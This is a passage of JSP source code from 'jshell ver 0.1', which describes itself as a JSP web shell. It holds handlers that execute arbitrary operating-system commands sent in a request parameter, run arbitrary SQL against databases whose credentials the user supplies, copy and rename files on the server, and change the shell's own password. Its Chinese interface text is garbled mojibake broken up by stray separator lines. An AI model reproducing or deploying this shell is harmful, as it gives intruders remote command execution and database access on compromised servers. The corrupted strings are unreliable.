String[] files2Copy = request.getParameterValues("filesDelete");
|
||
String dstPath = request.getParameter("dstPath").trim();
|
||
if (files2Copy.length == 0) {
|
||
result = "<font color=\"red\">û<><C3BB>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD><D2AA><EFBFBD>Ƶ<EFBFBD><C6B5>ļ<EFBFBD></font>";
|
||
} else if (dstPath.equals("")) {
|
||
result = "<font color=\"red\">û<><C3BB><EFBFBD><EFBFBD>дҪ<D0B4><D2AA><EFBFBD>Ƶ<EFBFBD><C6B5><EFBFBD>Ŀ¼·<C2BC><C2B7></font>";
|
||
} else {
|
||
for (int i = 0; i < files2Copy.length; i ++)
|
||
files2Copy[i] = Unicode2GB(files2Copy[i]);
|
||
|
||
result = copyFiles(curPath, request.getRequestURI() + "?action=" + action, files2Copy, Unicode2GB(dstPath));
|
||
}
|
||
}
|
||
} else if (fsAction.equals("rename")) {
|
||
if (request.getParameter("fileRename") == null) {
|
||
result = "<font color=\"red\">ҳ<>浼<EFBFBD><E6B5BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD></font>";
|
||
} else {
|
||
String file2Rename = request.getParameter("fileRename").trim();
|
||
String newName = request.getParameter("newName").trim();
|
||
if (file2Rename.equals("")) {
|
||
result = "<font color=\"red\">û<><C3BB>ѡ<EFBFBD><D1A1>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></font>";
|
||
} else if (newName.equals("")) {
|
||
result = "<font color=\"red\">û<><C3BB><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD></font>";
|
||
} else {
|
||
result = renameFile(curPath, request.getRequestURI() + "?action=" + action, Unicode2GB(file2Rename), Unicode2GB(newName));
|
||
}
|
||
}
|
||
}
|
||
%>
|
||
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
|
||
<form method="post" name="form2" action="<%= request.getRequestURI() + "?action=" + action%>">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><>ַ <input type="text" size="80" name="curPath" class="textbox" value="<%=curPath%>" />
|
||
<input type="submit" value="ת<><D7AA>" class="button" /></td>
|
||
</tr>
|
||
</form>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td><%= result.trim().equals("")?" " : result%></td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
} else if (action.equals("command")) {
|
||
String cmd = "";
|
||
InputStream ins = null;
|
||
String result = "";
|
||
|
||
if (request.getParameter("command") != null) {
|
||
cmd = (String)request.getParameter("command");
|
||
result = exeCmd(cmd);
|
||
}
|
||
// print the command form
|
||
//========================================================================================
|
||
%>
|
||
<table border="0" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC" align="center">
|
||
<form name="form2" method="post" action="<%=request.getRequestURI() + "?action=" + action%>">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center">ִ<><D6B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center">
|
||
<input type="text" class="textbox" size="80" name="command" value="<%=cmd%>" />
|
||
<input type="submit" class="button" value="ִ<><D6B4>" />
|
||
</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center">ִ<>н<EFBFBD><D0BD><EFBFBD></td>
|
||
</tr>
|
||
</form>
|
||
</table>
|
||
<table align="center" width="600" border="0">
|
||
<tr>
|
||
<td><%=result == "" ? " " : result%></td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
//=========================================================================================
|
||
// end of printing command form
|
||
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
} else if (action.equals("database")) {
|
||
String dbAction = "";
|
||
String result = "";
|
||
String dbType = "";
|
||
String dbServer = "";
|
||
String dbPort = "";
|
||
String dbUsername = "";
|
||
String dbPassword = "";
|
||
String dbName = "";
|
||
String dbResult = "";
|
||
String sql = "";
|
||
|
||
if (request.getParameter("dbAction") == null) {
|
||
dbAction = "main";
|
||
} else {
|
||
dbAction = request.getParameter("dbAction").trim();
|
||
if (dbAction.equals(""))
|
||
dbAction = "main";
|
||
}
|
||
|
||
if (dbAction.equals("main")) {
|
||
result = " ";
|
||
} else if (dbAction.equals("dbConnect")) {
|
||
if (request.getParameter("dbType") == null ||
|
||
request.getParameter("dbServer") == null ||
|
||
request.getParameter("dbPort") == null ||
|
||
request.getParameter("dbUsername") == null ||
|
||
request.getParameter("dbPassword") == null ||
|
||
request.getParameter("dbName") == null) {
|
||
response.sendRedirect(request.getRequestURI() + "?action=" + action);
|
||
} else {
|
||
dbType = request.getParameter("dbType").trim();
|
||
dbServer = request.getParameter("dbServer").trim();
|
||
dbPort = request.getParameter("dbPort").trim();
|
||
dbUsername = request.getParameter("dbUsername").trim();
|
||
dbPassword = request.getParameter("dbPassword").trim();
|
||
dbName = request.getParameter("dbName").trim();
|
||
|
||
if (DBInit(dbType, dbServer, dbPort, dbUsername, dbPassword, dbName)) {
|
||
if (DBConnect(dbUsername, dbPassword)) {
|
||
if (request.getParameter("sql") != null) {
|
||
sql = request.getParameter("sql").trim();
|
||
if (! sql.equals("")) {
|
||
dbResult = DBExecute(sql);
|
||
}
|
||
}
|
||
|
||
result = "<script language=\"javascript\">\n";
|
||
result += "<!--\n";
|
||
result += "function exeSql() {\n";
|
||
result += " if (ltrim(document.dbInfo.sql.value) != \"\")\n";
|
||
result += " document.dbInfo.submit();";
|
||
result += "}\n";
|
||
result += "\n";
|
||
result += "function resetIt() {\n";
|
||
result += " document.dbInfo.sql.value = \"\";";
|
||
result += "}\n";
|
||
result += "//-->\n";
|
||
result += "</script>\n";
|
||
result += "sql<71><6C><EFBFBD><EFBFBD><br/><textarea name=\"sql\" cols=\"70\" rows=\"6\">" + sql + "</textarea><br/><input type=\"submit\" class=\"button\" onclick=\"javascript:exeSql()\" value=\"ִ<><D6B4>\"/> <input type=\"reset\" class=\"button\" onclick=\"javascript:resetIt()\" value=\"<22><><EFBFBD><EFBFBD>\"/>\n";
|
||
|
||
DBRelease();
|
||
} else {
|
||
result = "<font color=\"red\"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7></font>";
|
||
}
|
||
} else {
|
||
result = "<font color=\"red\"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD>ҵ<EFBFBD></font>";
|
||
}
|
||
}
|
||
}
|
||
%>
|
||
<script language="javascript">
|
||
<!--
|
||
<%
|
||
out.println("var selectedType = \"" + dbType + "\";");
|
||
%>
|
||
//-->
|
||
</script>
|
||
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
|
||
<form name="dbInfo" method="post" action="<%=request.getRequestURI() + "?action=" + action + "&dbAction=dbConnect"%>">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td width="300" align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center">
|
||
<select name="dbType">
|
||
<option value="sqlserver">SQLServer<65><72><EFBFBD>ݿ<EFBFBD></option>
|
||
<option value="mysql">MySql<71><6C><EFBFBD>ݿ<EFBFBD></option>
|
||
<option value="oracle">Oracle<6C><65><EFBFBD>ݿ<EFBFBD></option>
|
||
<option value="db2">DB2<42><32><EFBFBD>ݿ<EFBFBD></option>
|
||
<option value="odbc">ODBC<42><43><EFBFBD><EFBFBD>Դ</option>
|
||
</select>
|
||
<script language="javascript">
|
||
for (var i = 0; i < document.dbInfo.dbType.options.length; i ++) {
|
||
if (document.dbInfo.dbType.options[i].value == selectedType) {
|
||
document.dbInfo.dbType.options[i].selected = true;
|
||
}
|
||
}
|
||
</script>
|
||
</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ</td>
|
||
<td align="center"><input type="text" name="dbServer" class="textbox" value="<%=dbServer%>" style="width:150px;" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˿<EFBFBD></td>
|
||
<td align="center"><input type="text" name="dbPort" class="textbox" value="<%=dbPort%>" style="width:150px;" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF>û<EFBFBD><C3BB><EFBFBD></td>
|
||
<td align="center"><input type="text" name="dbUsername" class="textbox" value="<%=dbUsername%>" size="20" style="width:150px;" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td align="center"><input type="password" name="dbPassword" class="textbox" value="<%=dbPassword%>" size="20" style="width:150px;" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD></td>
|
||
<td align="center"><input type="text" name="dbName" class="textbox" value="<%=dbName%>" size="20" style="width:150px;" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center" colspan="2"><input type="submit" value="<22><><EFBFBD><EFBFBD>" class="button" /> <input type="reset" value="<22><><EFBFBD><EFBFBD>" class="button" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center" colspan="2"><%=result%></td>
|
||
</tr>
|
||
</form>
|
||
</table>
|
||
<table align="center" width="100%" border="0">
|
||
<tr>
|
||
<td align="center">
|
||
<%=dbResult%>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
|
||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
} else if (action.equals("config")) {
|
||
String cfAction = "";
|
||
int i;
|
||
|
||
if (request.getParameter("cfAction") == null) {
|
||
cfAction = "main";
|
||
} else {
|
||
cfAction = request.getParameter("cfAction").trim();
|
||
if (cfAction.equals(""))
|
||
cfAction = "main";
|
||
}
|
||
|
||
if (cfAction.equals("main")) {
|
||
// start of config form
|
||
//==========================================================================================
|
||
%>
|
||
<script language="javascript">
|
||
<!--
|
||
function delFileType() {
|
||
document.config.newType.value = document.config.textFileTypes[document.config.textFileTypes.selectedIndex].value;
|
||
document.config.textFileTypes.options.remove(document.config.textFileTypes.selectedIndex);
|
||
}
|
||
|
||
function addFileType() {
|
||
if (document.config.newType.value != "") {
|
||
var oOption = document.createElement("OPTION");
|
||
document.config.textFileTypes.options.add(oOption);
|
||
oOption.value = document.config.newType.value;
|
||
oOption.innerHTML = document.config.newType.value;
|
||
}
|
||
}
|
||
|
||
function selectAllTypes() {
|
||
for (var i = 0; i < document.config.textFileTypes.options.length; i ++) {
|
||
document.config.textFileTypes.options[i].selected = true;
|
||
}
|
||
}
|
||
//-->
|
||
</script>
|
||
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
|
||
<form name="config" method="post" action="<%=request.getRequestURI() + "?action=config&cfAction=save"%>" onSubmit="javascript:selectAllTypes()">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center" width="200"><3E><><EFBFBD><EFBFBD></td>
|
||
<td><input type="text" size="30" name="password" class="textbox" value="<%=_password%>" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center">ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD></td>
|
||
<td><input type="text" size="30" name="encode" value="<%=_encodeType%>" class="textbox" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center">Session<6F><6E>ʱʱ<CAB1><CAB1></td>
|
||
<td><input type="text" size="5" name="sessionTime" class="textbox" value="<%=_sessionOutTime%>" /></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E>ɱ༭<C9B1>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD></td>
|
||
<td>
|
||
<table border="0" width="190" cellpadding="0" cellspacing="0">
|
||
<tr>
|
||
<td>
|
||
<input type="text" size="11" class="textbox" name="newType" />
|
||
</td>
|
||
<td align="center">
|
||
<input type="button" onClick="javascript:delFileType()" value="<<" class="button" />
|
||
<p></p>
|
||
<input type="button" value=">>" onClick="javascript:addFileType()" class="button" />
|
||
</td>
|
||
<td align="right">
|
||
<select name="textFileTypes" size="4" style="width: 87px" multiple="true">
|
||
<%
|
||
for (i = 0; i < _textFileTypes.length; i ++) {
|
||
%>
|
||
<option value="<%=_textFileTypes[i]%>"><%=_textFileTypes[i]%></option>
|
||
<%
|
||
}
|
||
%>
|
||
</select>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center" colspan="2"><input type="submit" value="<22><><EFBFBD><EFBFBD>" class="button" /></td>
|
||
</tr>
|
||
</form>
|
||
</table>
|
||
<%
|
||
} else if (cfAction.equals("save")) {
|
||
if (request.getParameter("password") == null ||
|
||
request.getParameter("encode") == null ||
|
||
request.getParameter("sessionTime") == null ||
|
||
request.getParameterValues("textFileTypes") == null) {
|
||
response.sendRedirect(request.getRequestURI());
|
||
}
|
||
|
||
String result = "";
|
||
|
||
String newPassword = request.getParameter("password").trim();
|
||
String newEncodeType = request.getParameter("encode").trim();
|
||
String newSessionTime = request.getParameter("sessionTime").trim();
|
||
String[] newTextFileTypes = request.getParameterValues("textFileTypes");
|
||
String jshellPath = request.getRealPath(request.getServletPath());
|
||
|
||
try {
|
||
JshellConfig jconfig = new JshellConfig(jshellPath);
|
||
jconfig.setPassword(newPassword);
|
||
jconfig.setEncodeType(newEncodeType);
|
||
jconfig.setSessionTime(newSessionTime);
|
||
jconfig.setTextFileTypes(newTextFileTypes);
|
||
jconfig.save();
|
||
result += "<22><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD>ɹ<EFBFBD><C9B9><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڷ<EFBFBD><DAB7>أ<EFBFBD><D8A3><EFBFBD><EFBFBD>Ժ<D4BA>";
|
||
result += "<meta http-equiv=\"refresh\" content=\"2;url=" + request.getRequestURI() + "?action=" + request.getParameter("action") + "\">";
|
||
} catch (JshellConfigException e) {
|
||
result = "<font color=\"red\">" + e.getMessage() + "</font>";
|
||
}
|
||
|
||
%>
|
||
<table align="center" width="600" border="0" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td><%=result == "" ? " " : result%></td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
}
|
||
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||
//==========================================================================================
|
||
// end of config form
|
||
} else if (action.equals("about")) {
|
||
// start of about
|
||
//==========================================================================================
|
||
%>
|
||
<table border="0" align="center" width="600" cellpadding="2" cellspacing="1" bgcolor="#CCCCCC">
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="center"><3E><><EFBFBD><EFBFBD> jshell ver 0.1</td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td> Jshell<6C><6C>һ<EFBFBD><D2BB><EFBFBD><EFBFBD>jsp<73><70>Web Shell<6C><6C><EFBFBD><EFBFBD><EFBFBD>ܼܺ<DCBC><F2B5A5A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>⼸<EFBFBD><E2BCB8><EFBFBD>Ͽο<CFBF><CEBF><EFBFBD>ʱ<EFBFBD><CAB1><EFBFBD><EFBFBD>û<EFBFBD>Ǹ<EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD>ģ<EFBFBD><C4A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҳ<EFBFBD><D2B2><EFBFBD>˵<EFBFBD><CBB5><EFBFBD><EFBFBD>Σ<EFBFBD><CEA3><EFBFBD><EFBFBD>ó<EFBFBD><C3B3><EFBFBD>ϣ<EFBFBD><CFA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD><D0B5>ô<EFBFBD><C3B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ң<EFBFBD><D2A3>ɶ<EFBFBD><C9B6>Բ<EFBFBD><D4B2>ã<EFBFBD><C3A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǻ<EFBFBD>ӭ<EFBFBD><D3AD><EFBFBD><EFBFBD>Ȥ<EFBFBD><C8A4><EFBFBD><EFBFBD><EFBFBD>Ѻ<EFBFBD><D1BA>ҽ<EFBFBD><D2BD><EFBFBD><EFBFBD><EFBFBD></td>
|
||
</tr>
|
||
<tr bgcolor="#FFFFFF">
|
||
<td align="right">created by <a href="mailto:luoluonet@hotmail.com">luoluo</a> and welcome to <a href="http://www.ph4nt0m.org" target="_blank"><3E><>Ӱ<EFBFBD><D3B0><EFBFBD><EFBFBD></a></td>
|
||
</tr>
|
||
</table>
|
||
<%
|
||
//==========================================================================================
|
||
}
|
||
}
|
||
%>
|
||
</body>
|
||
</html>
|
||
|